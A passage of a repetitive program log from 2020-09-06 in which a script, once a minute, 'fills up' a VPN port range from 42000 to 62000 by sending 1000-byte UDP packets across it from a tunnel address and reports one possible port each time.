6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:54:04 -Starting port fill at 2020-09-06 11:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:55:04 -Starting port fill at 2020-09-06 11:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:56:06 -Starting port fill at 2020-09-06 11:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:57:05 -Starting port fill at 2020-09-06 11:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:58:04 -Starting port fill at 2020-09-06 11:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:59:04 -Starting port fill at 2020-09-06 12:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:00:04 -Starting port fill at 2020-09-06 12:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:01:05 -Starting port fill at 2020-09-06 12:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:02:05 -Starting port fill at 2020-09-06 12:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:03:05 -Starting port fill at 2020-09-06 12:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:04:05 -Starting port fill at 2020-09-06 12:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:05:06 -Starting port fill at 2020-09-06 12:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:06:05 -Starting port fill at 2020-09-06 12:07:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:07:05 -Starting port fill at 2020-09-06 12:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:08:04 -Starting port fill at 2020-09-06 12:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:09:04 -Starting port fill at 2020-09-06 12:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:10:06 -Starting port fill at 2020-09-06 12:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:11:04 -Starting port fill at 2020-09-06 12:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:12:04 -Starting port fill at 2020-09-06 12:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:13:05 -Starting port fill at 2020-09-06 12:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:14:05 -Starting port fill at 2020-09-06 12:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:15:06 -Starting port fill at 2020-09-06 12:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 